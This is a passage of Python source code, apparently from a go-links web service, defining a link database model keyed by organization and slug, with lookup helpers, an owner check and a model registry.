write_capacity_units = 1
name = UnicodeAttribute(hash_key=True) # contains organization name and link name
url = UnicodeAttribute()
owner = UnicodeAttribute()
@staticmethod
def name_from_organization_and_slug(organization, slug):
return f"{organization}|{slug}"
@classmethod
def get_from_organization_and_slug(cls, organization, slug, **kwargs):
name = cls.name_from_organization_and_slug(organization, slug)
return cls.get(hash_key=name, **kwargs)
@classmethod
def get_or_init(cls, user, slug):
name = cls.name_from_organization_and_slug(user.organization, slug)
try:
link = cls.get(name)
except cls.DoesNotExist:
link = cls(name=name)
link.owner = user.email
return link
@property
def organization(self):
o, _ = self.name.split("|")
return o
@property
def slug(self):
_, s = self.name.split("|")
return s
@property
def owner_user(self):
from goslinks.db.factory import get_model
if not self.owner.endswith(self.organization):
raise AssertionError(
"Owner does not belong to the organization this link is contained in"
)
return get_model("user").get(self.owner)
MODEL_REGISTRY = {"user": UserModel, "link": LinkModel}
| 25.697674 | 86 | 0.623529 | 2,097 | 0.948869 | 0 | 0 | 1,525 | 0.690045 | 0 | 0 | 216 | 0.097738 |